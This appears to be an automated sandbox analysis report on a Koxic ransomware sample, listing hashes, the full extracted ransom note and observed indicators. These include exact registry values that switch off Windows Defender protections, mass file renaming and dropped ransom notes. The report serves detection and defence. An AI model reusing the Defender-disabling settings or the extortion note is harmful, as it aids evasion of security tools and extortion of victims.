koxic | d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333

Resubmissions

11/10/2022, 07:47

221011-jmlcracher 10

11/10/2022, 07:35

221011-jeym4sccd3 10

Analysis

max time kernel
95s
max time network
106s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
11/10/2022, 07:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Size

158KB
MD5

3c4fa896e819cb8fada88a6fdd7b2cc7
SHA1

0ebf10867534cb472bb98344f80e3a8aac0aa507
SHA256

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333
SHA512

e4486c33fc7bf99700fabec50ead10a6159758603d50eabe650436098a977b8c9dc728d0e8dbc3e3718393a7ba67cca8ea2799ef83e9194f178f04ae9784473e
SSDEEP

3072:Wkb6bwPcmQ1mbTw8Gt189VTG079sTGyAzbnuvXdIR:WkTPcmscw/1ETGgWGy0uvC

Score

10^/10

koxic evasion ransomware trojan

Malware Config

Extracted

Path

C:\Program Files\Microsoft Office\root\Integration\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt

Ransom Note

--=== Hello ===--- [+] Whats Happen? [+] Your sensitive information and data were downloaded. Your files are encrypted, and currently unavailable just so you can contact us faster. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] We are not interested in distributing information, we are interested in agreeing with you - these are your guarantees. Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should send sample to us to decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise-time is much more valuable than money. [+] How to contact us? [+] Just write us an email to [email protected] [+] Consequences if we do not find a common language [+] 1. The data were irretrievably lost. 2. Leaked data will be published or sold on blmarket (or to competitors). 3. In some cases, DDOS attacks will be applied to your inftastructure. !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! Your UserID: 09FDE0CB1B456FCC13467CB526CA3EE11CD1333DCA5C316728CC9BDCF0A1F0705CCEEC0C3326109981 420F28C3403EDC1A04EEE0DF2C2F550EF47171F20BF2E862894AF076BA84E7466078F68B4D5B40DD8B 7EB2848E9DA8C48F753555AE1A16D0FFD9B2CBA98B072CC1A6A7BD6E042535409E7459B510C16EE80E 2DCE9C6DC9686709D5F6C96F04F321C0DF9DA4C669CAD926EF32D2997858651015C7A8E36286538CF3 38325A9591E106F8135ECC8A75622E4C070E19F78F681F7F9DD89ECAC30A9B07FAB5A5766482E3F6BC 4D973A1982B68A9C359C6C8C6CC68D4A952562200C118256B474823045229D6F9E1344C4D6A8624ACA FECCA2E5AE935A18F1653082010A0282010100DE0D785BE65C3CFD4F15838B87842201D3A6A50AF282 D9EE1EA994D059DCB43BC7DE7B9A9F542A0F2BF3DE0FE3577ADC0ABB5D55E833055E87BC207491DC1B 99BB2708650F1D88783E3990874B882FB3C0CCDA0C5B303F42F00F4682267D37BF728648C92D77DFDD 134C5782686A663B9A18DD978DD1074BDE659E31C23620FF862C688675F2B50A690345F7A927EE9350 94254F20C6CBAA13F166F2ED6A5A3C793BDBC9CC0A425297799C04E586403A46480D05200B260D5B19 54880915AB45C59236C2B3DCEDC8D0EEC69B52469CBF6B058259012D2CAA8C1B1AD82D5274B92B4EBC F9C9E87EB075743791BC5019029CE808D6DE828FC4F25BA53F351F6BF1020301000122EAA4E8F9CA74 00275EA73F2F67F3E44C4E454C44

Emails

[email protected]

Signatures

Koxic
A C++ written ransomware first seen in late 2021.
ransomware koxic

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Disables taskbar notifications via registry modification
evasion

Modifies extensions of user files 18 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ConvertSearch.tiff.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\RestoreComplete.raw.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\OptimizeSave.tiff.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\InvokeSwitch.tif => C:\Users\Admin\Pictures\InvokeSwitch.tif.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\DisableBlock.tiff.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\BackupUnlock.tif => C:\Users\Admin\Pictures\BackupUnlock.tif.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\SkipSend.crw.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\ReadRepair.raw => C:\Users\Admin\Pictures\ReadRepair.raw.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\OptimizeSave.tiff => C:\Users\Admin\Pictures\OptimizeSave.tiff.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\ConvertSearch.tiff => C:\Users\Admin\Pictures\ConvertSearch.tiff.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\UndoSend.tif => C:\Users\Admin\Pictures\UndoSend.tif.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\SkipSend.crw => C:\Users\Admin\Pictures\SkipSend.crw.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\BackupUnlock.tif.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\DisableBlock.tiff => C:\Users\Admin\Pictures\DisableBlock.tiff.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\UndoSend.tif.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File renamed	C:\Users\Admin\Pictures\RestoreComplete.raw => C:\Users\Admin\Pictures\RestoreComplete.raw.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\ReadRepair.raw.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Users\Admin\Pictures\InvokeSwitch.tif.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1"	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\download.svg.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-pl.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\flags.png.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\et_get.svg.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-pl.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft.NET\ADOMD.NET\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\officemuiset.msi.16.en-us.vreg.dat.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_remove_18.svg.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\ui-strings.js.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Confirmation.png.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalDemoR_BypassTrial180-ul-oob.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Resources\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ppd.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\METCONV.TXT.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\AppxMetadata\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\close.svg.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-phn.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\et-EE\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main.css.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\ui-strings.js.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\ui-strings.js.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ppd.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.ELM.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\ui-strings.js.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ul-phn.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ppd.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\CAPSULES.ELM.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.MSOUC.16.1033.hxn.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-gb\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-gb\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsrom.xml.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_reader_logo.svg.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pa\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-ul-phn.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pt_BR.jar.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\he-IL\tipresx.dll.mui.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_audit_report_18.svg.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_KMS_Client-ul-oob.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-pl.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-pl.xrm-ms.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif.KOXIC_LNELD	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1860	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1276	taskkill.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\ui-strings.jsC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
File created	C:\Users\Admin\AppData\Local\Temp\ui-strings.jsC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3664	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4852	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeBackupPrivilege	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeRestorePrivilege	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeManageVolumePrivilege	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeTakeOwnershipPrivilege	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeSecurityPrivilege	2368	WMIC.exe
Token: SeTakeOwnershipPrivilege	2368	WMIC.exe
Token: SeLoadDriverPrivilege	2368	WMIC.exe
Token: SeSystemProfilePrivilege	2368	WMIC.exe
Token: SeSystemtimePrivilege	2368	WMIC.exe
Token: SeProfSingleProcessPrivilege	2368	WMIC.exe
Token: SeIncBasePriorityPrivilege	2368	WMIC.exe
Token: SeCreatePagefilePrivilege	2368	WMIC.exe
Token: SeBackupPrivilege	2368	WMIC.exe
Token: SeRestorePrivilege	2368	WMIC.exe
Token: SeShutdownPrivilege	2368	WMIC.exe
Token: SeDebugPrivilege	2368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2368	WMIC.exe
Token: SeRemoteShutdownPrivilege	2368	WMIC.exe
Token: SeUndockPrivilege	2368	WMIC.exe
Token: SeManageVolumePrivilege	2368	WMIC.exe
Token: 33	2368	WMIC.exe
Token: 34	2368	WMIC.exe
Token: 35	2368	WMIC.exe
Token: 36	2368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeSecurityPrivilege	2368	WMIC.exe
Token: SeTakeOwnershipPrivilege	2368	WMIC.exe
Token: SeLoadDriverPrivilege	2368	WMIC.exe
Token: SeSystemProfilePrivilege	2368	WMIC.exe
Token: SeSystemtimePrivilege	2368	WMIC.exe
Token: SeProfSingleProcessPrivilege	2368	WMIC.exe
Token: SeIncBasePriorityPrivilege	2368	WMIC.exe
Token: SeCreatePagefilePrivilege	2368	WMIC.exe
Token: SeBackupPrivilege	2368	WMIC.exe
Token: SeRestorePrivilege	2368	WMIC.exe
Token: SeShutdownPrivilege	2368	WMIC.exe
